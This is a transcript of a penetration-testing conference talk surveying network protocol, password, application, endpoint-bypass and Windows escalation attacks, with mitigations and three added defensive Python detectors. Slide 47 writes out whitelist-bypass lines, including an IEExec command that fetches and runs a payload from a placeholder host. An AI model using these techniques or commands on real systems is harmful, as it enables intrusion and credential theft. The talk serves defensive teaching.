Secure360 - Attack All the Layers! Again!
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. The talk includes real-world examples of attacks that the presenters use on a daily basis, and some reflections on which techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers are all covered, along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real-world attacks.

More security blogs by the authors can be found @
https://www.netspi.com/blog/

Notes
  • Validation controls = IDS/IPS/WAF, incident response
  • These are protocols that are commonly targeted. However, there are many others:
    - Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds
    - NetBIOS Name Service (NBNS): Metasploit and Responder
    - Link-local Multicast Name Resolution (LLMNR): Metasploit and Responder
    - Preboot Execution Environment (PXE): Metasploit
    - Dynamic Trunking Protocol (DTP): Yersinia
    - Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin)
    - Hot Standby Router Protocol (HSRP): Yersinia
    - Dynamic Host Configuration Protocol (DHCP): Interceptor, Metasploit, manual setup
    - Domain Name Services (DNS): Metasploit, ettercap, dsniff, zodiac, ADMIdPack
    - VLAN Trunking Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig
  • Been an issue since the birth of the internet and hasn't really gone away. ARP is a broadcast protocol used for IP to MAC relationships. Limited to the broadcast network. No encryption or validation allows for spoofing.
    - MITM step 1: tell the server you are the client
    - MITM step 2: tell the client you are the server
    Can also broadcast as the gateway to all systems on the subnet, but you're most likely not a router, so don't do that. Can also DoS very easily.
  • Windows protocol. Kind of like a backup to DNS. Resolution order: hosts file, DNS, NBNS. Race condition. Limited to the broadcast network.
  • Go with what you like: http basic, http_ntlmauth, http_relay, smb
  • In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow SMB attacks to be successful were identified as a threat in the late 90's. However, it wasn't until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system. I guess the good news is that SMB relay attacks can be prevented by enabling and requiring SMB message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems. 2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack. Anyway, let's get back on track…
  • Image showing MITM
  • The unauthorized switch can send DTP frames and form a trunk with the company switch. If the attacker can establish a trunk link to the company switch, it receives traffic for all VLANs through the trunk, because all VLANs are allowed on a trunk by default.
  • Touch on common tools and pitfalls (account lockouts)
  • Common application attacks and the tools for each:
    - Default and weak passwords for everything. Tools: Nmap, Nessus, Web Scour, manuals, Google
    - SQL injection. Tools: manually, web scanners, SQL Ninja, SQLMap, Metasploit
    - RFI/web shells (JBoss, Tomcat, etc.). Tools: Metasploit, FuzzDB, and other web shellery
    - Web directory traversals. Tools: manually, web scanners, FuzzDB, Metasploit
    - Critical missing patches (SEP etc.). Tools: Metasploit, exploitdb exploits, etc.
  • Execution via approved apps: PowerShell code injection, Rundll32, IEExec. Directory exceptions (GAC). Disable services. Poisoning the allowed file list and blocking updates via the hosts file. Poisoning updates.
  • This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • Local user -> Local Administrator:
    - Excessive local group privileges (admin or power users)
    - Cleartext credentials: Sysprep (unattend.xml/ini/txt); config files, scripts, logs, desktop folders; tech support call files
    - Weak application configurations that allow: restarting or reconfiguring services; replacing application files; DLL pre- or side-loading; executable injection via poorly registered services (C:\Program Files (x86) vs "C:\Program Files (x86)")
    - Local and remote exploits (Metasploit: getsystem)
  • Yes it did.
Transcript of "Secure360 - Attack All the Layers! Again!"

1. INTRODUCTIONS
Scott Sutherland
- Principal Security Consultant @ NetSPI
- Twitter: @_nullbind
Karl Fosaaen
- Senior Security Consultant @ NetSPI
- Twitter: @kfosaaen
We specialize in both things and stuff!

2. OVERVIEW
• Why do companies pen test?
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
• Conclusions

3. WHY DO COMPANIES PEN TEST?
• Compliance requirements
• Evaluate risks associated with an acquisition or partnership
• Validate preventative controls
• Validate detective controls
• Prioritize internal security initiatives
• Proactively prevent breaches

4. OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation

5. ATTACKING PROTOCOLS
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• PXE: Preboot Execution Environment
• DTP: Dynamic Trunking Protocol

6. ATTACKING PROTOCOLS: ARP
Address Resolution Protocol

7. ATTACKING PROTOCOLS: ARP
• General
  - MAC to IP association
  - Layer 2
• Conditions
  - Independent of user action
  - Broadcast network
• Attacks
  - MITM Monitoring
  - MITM Injection
  - DOS

8. ATTACKING PROTOCOLS: ARP
(diagram slide: no text)

9. ATTACKING PROTOCOLS: ARP
Common mitigating controls:
• Dynamic ARP Inspection
• Port Security
• Static Routes (not recommended)
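Detection logic for the two-step ARP poisoning described in the ARP slides and speaker notes, as an added example that is not from the talk: it parses raw ARP replies, keeps the IP-to-MAC binding that Dynamic ARP Inspection would enforce at the switch, and flags a rebinding as well as one MAC answering for both the gateway and a client. All MACs, addresses and frames are constructed sample data.

```python
"""Flag ARP cache poisoning from a feed of raw Ethernet/ARP frames.
Added example for the ARP section of this talk; every address and frame
below is constructed sample data, not captured traffic."""
import struct

ETH = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP, ARP_REPLY = 0x0806, 2

def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def fmt_ip(raw):
    return ".".join(str(b) for b in raw)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip), or None for non-ARP frames."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, _src, ethertype = ETH.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # Ethernet / IPv4 only
        return None
    return op, fmt_mac(sha), fmt_ip(spa), fmt_ip(tpa)

class ArpWatch:
    """Learns IP->MAC from the first reply seen (the trusted binding a switch's
    Dynamic ARP Inspection takes from DHCP snooping) and alerts on contradictions."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.table = {}    # ip -> mac first learned
        self.claims = {}   # mac -> set of ips it has answered for

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return []
        _op, sha, spa, _tpa = parsed
        alerts = []
        known = self.table.setdefault(spa, sha)
        if known != sha:                 # someone else now answers for this IP
            alerts.append(f"REBIND {spa}: {known} -> {sha}")
        ips = self.claims.setdefault(sha, set())
        ips.add(spa)
        # Steps 1 and 2 of the MITM together: one MAC answering both for the
        # gateway (or server) and for a client.
        if self.gateway_ip in ips and len(ips) > 1:
            others = sorted(ips - {self.gateway_ip})
            alerts.append(f"MITM {sha} answers for gateway {self.gateway_ip} and {others}")
        return alerts

def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build a constructed ARP reply frame (sample input for the detector)."""
    smac, tmac = (bytes.fromhex(m.replace(":", "")) for m in (sender_mac, target_mac))
    sip, tip = (bytes(int(o) for o in a.split(".")) for a in (sender_ip, target_ip))
    return ETH.pack(tmac, smac, ETHERTYPE_ARP) + ARP.pack(1, 0x0800, 6, 4, ARP_REPLY, smac, sip, tmac, tip)

def demo():
    """Replay the poisoning sequence from the slides against the detector."""
    gw, client, rogue = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
    watch = ArpWatch(gateway_ip="10.0.0.1")
    frames = [
        arp_reply(gw, "10.0.0.1", client, "10.0.0.50"),     # legitimate reply from the gateway
        arp_reply(rogue, "10.0.0.1", client, "10.0.0.50"),  # "I am the gateway", sent to the client
        arp_reply(rogue, "10.0.0.50", gw, "10.0.0.1"),      # "I am the client", sent to the gateway
    ]
    alerts = []
    for frame in frames:
        alerts.extend(watch.observe(frame))
    return alerts
```

A host with several legitimate IP aliases will also trip the MITM rule, so in practice seed the table from DHCP leases or a static inventory rather than from the first reply seen.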
10. ATTACKING PROTOCOLS: NBNS / LLMNR
NetBIOS Name Service

11. ATTACKING PROTOCOLS: NBNS
• General
  - IP to hostname association
  - Layer 5 / 7
• Constraints
  - Dependent on user action
  - Broadcast network
  - Windows only
• Attacks
  - MITM Monitoring
  - MITM Injection
  - DOS

12. ATTACKING PROTOCOLS: NBNS
(diagram slide: no text)

13. ATTACKING PROTOCOLS: NBNS
(diagram slide: no text)

14. ATTACKING PROTOCOLS: NBNS
(diagram slide: no text)

15. ATTACKING PROTOCOLS: NBNS
Common mitigating controls:
• Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS
• Disable NBNS
• Disable insecure authentication methods to help limit the impact of exposed hashes
• Enable packet signing to help prevent SMB Relay attacks
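Added example for the NBNS section (not from the talk): a decoder for the NetBIOS first-level name encoding and a triage routine over name queries seen on the wire. Any NBNS query means the hosts file and DNS already failed for that name, which is exactly the window a spoofed answer wins, and a WPAD query in particular shows the WPAD DNS entry from the mitigation list is missing. The packets and source addresses are constructed.

```python
"""Decode NetBIOS Name Service queries and triage what they reveal about the
name resolution fallback chain (hosts file -> DNS -> NBNS).  Added example
for the NBNS section; the packets below are constructed, not captured."""
import struct

NBNS_HDR = struct.Struct("!HHHHHH")     # txid, flags, qdcount, ancount, nscount, arcount
QTYPE_NB, QCLASS_IN = 0x0020, 0x0001

def encode_nbns_name(name, suffix=0x00):
    """First-level encoding: 15 chars + suffix byte, each nibble mapped to 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw).encode("ascii")

def decode_nbns_name(encoded):
    """Inverse of encode_nbns_name: returns (name, suffix)."""
    if len(encoded) != 32 or any(not 0x41 <= c <= 0x50 for c in encoded):
        raise ValueError("malformed NBNS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]

def build_nbns_query(txid, name, suffix=0x00):
    """Construct a broadcast NAME QUERY REQUEST (sample input only)."""
    flags = 0x0110   # response=0, opcode=QUERY, recursion desired, broadcast
    question = b"\x20" + encode_nbns_name(name, suffix) + b"\x00" + struct.pack("!HH", QTYPE_NB, QCLASS_IN)
    return NBNS_HDR.pack(txid, flags, 1, 0, 0, 0) + question

def parse_nbns_query(pkt):
    """Return (txid, name, suffix) for a name query request, else None."""
    if len(pkt) < NBNS_HDR.size + 38:
        return None
    txid, flags, qdcount, _an, _ns, _ar = NBNS_HDR.unpack_from(pkt)
    if flags & 0x8000 or (flags >> 11) & 0x0F != 0 or qdcount != 1:
        return None                      # a response, or not the QUERY opcode
    off = NBNS_HDR.size
    if pkt[off] != 0x20 or pkt[off + 33] != 0x00:
        return None                      # expect one 32-byte label, then terminator
    qtype, = struct.unpack_from("!H", pkt, off + 34)
    if qtype != QTYPE_NB:
        return None
    try:
        name, suffix = decode_nbns_name(pkt[off + 1:off + 33])
    except ValueError:
        return None
    return txid, name, suffix

def triage_nbns(captures):
    """captures: iterable of (src_ip, udp_payload).  Every NBNS query means the
    name already failed hosts-file and DNS lookup, so a spoofed answer wins."""
    findings = {}
    for src, pkt in captures:
        query = parse_nbns_query(pkt)
        if query is None:
            continue
        _txid, name, suffix = query
        if name == "WPAD":
            msg = "WPAD fell through to NBNS: add a WPAD record in DNS or disable proxy auto-discovery"
        else:
            msg = f"{name}<{suffix:02X}> unresolved by DNS: stale or mistyped name, spoofable while NBNS is on"
        findings.setdefault(src, []).append(msg)
    return findings

def demo():
    captures = [
        ("10.0.0.50", build_nbns_query(0x1A2B, "WPAD")),
        ("10.0.0.50", build_nbns_query(0x1A2C, "FILESRV01", 0x20)),   # <20> = file server service
        ("10.0.0.51", b"\x00" * 50),                                    # junk, ignored
    ]
    return triage_nbns(captures)
```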
16. ATTACKING PROTOCOLS: SMB
Server Message Block

17. ATTACKING PROTOCOLS: SMB
• General
  - SMB is the comeback kid!
  - Layer 7
• Constraints
  - Dependent on user action
  - Any routable network
  - No connecting back to the originating host
• Attacks
  - Command execution
  - Shells..aaand shells

18. ATTACKING PROTOCOLS: SMB
(diagram slide: no text)

19. ATTACKING PROTOCOLS: SMB
Historically SMB Relay has been used to:
• Execute arbitrary commands
• Obtain shells
Lately the community has been developing tools for doing things like:
• LDAP queries
• SQL queries
• Exchange services
• Mounting file systems

20. ATTACKING PROTOCOLS: SMB
Common mitigating controls:
• Enable packet signing to help prevent SMB Relay attacks
• Apply really old patches, like if you missed out on the last decade…
21. ATTACKING PROTOCOLS: PXE
Preboot eXecution Environment

22. ATTACKING PROTOCOLS: PXE
• General
  - DHCP
• Attacks
  - Rogue PXE server
  - Command execution
  - Access to unencrypted drive images
  - Shells..aaand shells

23. ATTACKING PROTOCOLS: PXE
Common mitigating controls:
• MAC/IP filters
• Limit PXE to specific networks
• Network Access Controls (NAC)

24. ATTACKING PROTOCOLS: DTP
Dynamic Trunking Protocol

25. ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use a dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non-routable VLAN
• Configure all user ports as access ports to prevent trunk negotiation
• Configure frames with two 802.1Q headers
• Configure strong VACLs

26. ATTACKING PROTOCOLS: DTP
• General
  - 802.1Q encapsulation is in use
  - Layer 2
• Constraints
  - Independent of user action
  - Trunking is set to enabled or auto on the switch port
• Attacks
  - Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default
  - *Full VLAN hopping

27. ATTACKING PROTOCOLS: DTP
(diagram slide: no text)

28. ATTACKING PROTOCOLS: DTP
(diagram slide: no text)

29. ATTACKING PROTOCOLS: DTP
(diagram slide: no text)

30. ATTACKING PROTOCOLS: DTP
(diagram slide: no text)

31. ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use a dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non-routable VLAN
• Configure all user ports as access ports to prevent trunk negotiation
• Configure frames with two 802.1Q headers
• Configure strong VACLs

32. OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation
33. ATTACKING PASSWORDS
• Hashes and Cracking (Offline)
• Dictionary Attacks (Online)
• Dump in Cleartext!

34. ATTACKING PASSWORDS
Tool              Function                  Year
Pass the Hash     Passing Hashes            1997
Rainbow Tables    Password Cracking         2000s
SMB Relay         Relaying Captured Hashes  2001
John the Ripper   Password Cracking         2001
NetNTLM.pl        Cracking Network Hashes   2007
PTH Toolkit       Pass all the Hashes       2008
Hashcat           CPU and GPU Cracking      2010
WCE and Mimikatz  Cleartext Windows Creds   2012

35. ATTACKING PASSWORDS: DICTIONARY
• Online vs. Offline Attacks
• Dictionary Attacks
  - Enumerate users: null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc.
  - Attack!
• Are users getting smarter? Sort of…
  - "Spring2014" meets password complexity requirements

36. ATTACKING PASSWORDS: HASHES
• What are hashes?
  - A non-reversible way of storing passwords
  - Operating systems and applications
  - Lots of types: LM/NTLM (network and local), MD5, SHA, descrypt

37. ATTACKING PASSWORDS: HASHES
• How do we get hashes?
  - Cain and Abel
  - fgdump
  - Metasploit
  - Mimikatz
  - Databases
  - Config files

38. ATTACKING PASSWORDS: CRACKING
• Cracking Hashes
  - Rainbow Tables
  - John the Ripper
  - oclHashcat
  - CPU versus GPU

39. ATTACKING PASSWORDS: CRACKING
(chart: "Minutes for Six Character Brute Force", CPU vs. GPU; y-axis 0 to 600 minutes)

40. ATTACKING PASSWORDS: CRACKING
(image slide: GPU vs. CPU)

41. ATTACKING PASSWORDS: CLEARTEXT
• Common application configs
• Reversible formats
• Find in files: Groups.xml, Unattend.xml, Sysprep
• Registry
• WCE
• Mimikatz
42. OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation

43. ATTACKING APPLICATIONS: COMMON
• Default and weak passwords
• SQL injection
• RFI/web shells
• Web directory traversals
• UNC path injection + SMB relay
• Critical missing patches

44. ATTACKING APPLICATIONS: BREAKOUTS
• Obtain a common dialog box
• Bypass folder path and file type restrictions
• Bypass file execution restrictions
• Bypass file black/white lists
• Access to native consoles and management tools
• Downloading and using third-party applications

45. OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation

46. BYPASSING EPP: ANTI-VIRUS
• PowerShell code injection
• Execute off a network share
• Clone resource tables
• Modify import tables
• Pack files

47. BYPASSING EPP: APP WHITE LIST
• Rename executables
• Execution via approved apps
  - PowerShell code injection
  - Rundll32 mydll,DLLMain@12
  - IEExec http://x.x.x.x:8080/bypass.exe
  - cmd /c file.exe
• Directory exceptions
• Disable services
• Poisoning updates and approved file lists

48. OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows Escalation

49. WINDOWS ESCALATION: OVERVIEW
• Privilege Escalation Goals
• Local Privilege Escalation
• Domain Privilege Escalation

50. WINDOWS ESCALATION: GOALS
Local Escalation Goals
• Find clear text or reversible credentials with local administrative privileges
• Get an application to run commands as Administrator or LocalSystem
Domain Escalation Goals
• Find Domain Admins
• Impersonate Domain Admins

51. WINDOWS ESCALATION: LOCAL
Local Escalation
• *Clear text credentials in files, registry, over the network
• Insecure service paths
• DLL preloading
• DLL and exe replacement
• Binary planting in auto-run locations (registry and file system)
• Modifying scheduled tasks
• *Local and remote exploits
• Leverage local applications like IIS, SQL Server, etc.
• *UNC path injection + SMB Relay / Capture + crack
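An audit for the "insecure service paths" item, added here and not part of the talk: it lists the executables Windows would try for an unquoted ImagePath containing spaces (the C:\Program Files (x86) vs "C:\Program Files (x86)" case from the speaker notes), intersects them with directories a standard user can write to, and produces the quoted path that fixes the service. Service names, paths and the writable-directory list are constructed.

```python
"""Audit Windows service ImagePath values for the unquoted-path weakness the
local escalation slide calls out.  Added example; the services and the
user-writable directory list below are constructed, not read from a host."""
import ntpath
import re

EXE = re.compile(r"\.exe", re.IGNORECASE)

def service_path_candidates(image_path):
    """For an unquoted path with spaces, list the executables Windows tries
    before the intended one: the text up to each space, with .exe appended."""
    if image_path.startswith('"'):
        return []                                    # quoted, unambiguous
    m = EXE.search(image_path)
    exe = image_path[:m.end()] if m else image_path  # drop service arguments
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def quote_service_path(image_path):
    """The fix: wrap the executable part in double quotes, keep the arguments."""
    m = EXE.search(image_path)
    if image_path.startswith('"') or m is None:
        return image_path
    return f'"{image_path[:m.end()]}"{image_path[m.end():]}'

def audit_services(services, user_writable_dirs):
    """services: {name: ImagePath}.  user_writable_dirs: directories a standard
    user can create files in (from an ACL review; constructed here).  A finding
    means a non-admin could drop a binary that the service, usually running as
    LocalSystem, would start instead of the real one; fix the quoting and the ACL."""
    writable = {d.rstrip("\\").lower() for d in user_writable_dirs}
    findings = {}
    for name, path in services.items():
        exposed = [c for c in service_path_candidates(path)
                   if ntpath.dirname(c).rstrip("\\").lower() in writable]
        if exposed:
            findings[name] = {"exposed": exposed, "fix": quote_service_path(path)}
    return findings

def demo():
    services = {
        "AcmeAgent": r"C:\Program Files (x86)\Acme Tools\Agent Service\agent.exe -svc",
        "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -svc',
        "Spooler": r"C:\Windows\System32\spoolsv.exe",
    }
    writable = [r"C:\Program Files (x86)\Acme Tools"]   # weak ACL left by the installer
    return audit_services(services, writable)
```

The same logic applies to scheduled tasks and auto-run registry values, which the slide lists next to service paths.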
52. WINDOWS ESCALATION: DOMAIN
Domain Escalation – Find DAs
• Check locally! (Processes, Tokens, Cachedump)
• Review active sessions - netsess
• Review remote processes - tasklist
• Service Principal Names (SPN) – get-spn
• Scanning remote systems for NetBIOS information - nbtscan
• Pass the hash to other systems
• PowerShell shell spraying
• WinRM/WinRS shell spraying
• PsExec shell spraying

53. WINDOWS ESCALATION: DOMAIN
Domain Escalation – Impersonate DAs
• Dump passwords from memory with Mimikatz
• Migrate into the Domain Admin's process
• Steal Domain Admins' delegation tokens with Incognito
• Dump cached domain admin hashes with cachedump
Relatively new techniques
• PTH using Kerberos ticket

54. CONCLUSIONS
All can kind of be fixed
• Most networks: kind of broken
• Most protocols: kind of broken
• Most applications: kind of broken

55. ATTACK ALL THE LAYERS!
ANY QUESTIONS?

56. ATTACK ALL THE LAYERS!
Scott Sutherland
- Principal Security Consultant
- Twitter: @_nullbind
Karl Fosaaen
- Senior Security Consultant
- Twitter: @kfosaaen